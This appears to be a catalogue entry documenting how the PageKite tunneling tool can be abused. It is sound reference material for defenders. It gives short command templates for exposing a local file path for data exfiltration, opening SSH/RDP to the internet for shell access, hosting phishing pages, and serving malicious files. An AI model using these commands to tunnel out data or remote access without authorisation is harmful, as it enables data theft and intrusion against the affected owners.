.. /PageKite
Star

Install
Exfiltration
Access
Shell Access
Phishing
Download

PageKite is a fast, reliable localhost tunneling solution which is paid but allows a free version for 1 month. This can be abused by the threat actors as well as insiders to expose local apps, services over the internet as well as to download malicious binaries, host malware and to host phishing sites to target users.

Paths:

Resources:

Acknowledgements:

Detections:

Install

  1. PageKite allows to download a python program which can be called directly from the URL and can be executed on the local machine.

    curl -O https://pagekite.net/pk/pagekite.py
    Use case
    Downloading and execution of pagekite python program.
    Privileges required
    User
    Operating systems
    Windows, Mac, Linux

Exfiltration

  1. Exposing local file system over the internet for data exfiltration.

    pagekite.py <LOCAL PATH> <SUBDOMAIN>.pagekite.me
    Use case
    Hosting local file system and binding them to the PageKite domains for data exfiltration.
    Privileges required
    User
    Operating systems
    Windows, Mac, Linux

Access

  1. Exposing local services over the internet for external access.

    pagekite.py <PORT> <SUBDOMAIN>.pagekite.me
    Use case
    Hosting local services and binding them to the PageKite domains for external access.
    Privileges required
    User
    Operating systems
    Windows, Mac, Linux

Shell Access

  1. Exposing local ssh/rdp over PageKite domains for shell-access.

    pagekite.py <PORT> <SUBDOMAIN>.pagekite.me
    Use case
    Hosting local services i.e. SSH/RDP etc. for shell access.
    Privileges required
    User
    Operating systems
    Windows, Mac, Linux

Phishing

  1. Hosting phishing pages locally and exposing them via PageKite subdomains to target users.

    pagekite.py <PORT> <SUBDOMAIN>.pagekite.me
    Use case
    Hosting phishing pages locally by threat actors and using the PageKite domains to target the users.
    Privileges required
    User
    Operating systems
    Windows, Mac, Linux

Download

  1. Hosting malicious files/confidential files via a local path and exposing them over PageKite domains for download.

    pagekite.py <LOCAL PATH> <SUBDOMAIN>.pagekite.me
    Use case
    Hosting local files, malicious files, sensitive files and exposing them over PageKite domains for downloads.
    Privileges required
    User
    Operating systems
    Windows, Mac, Linux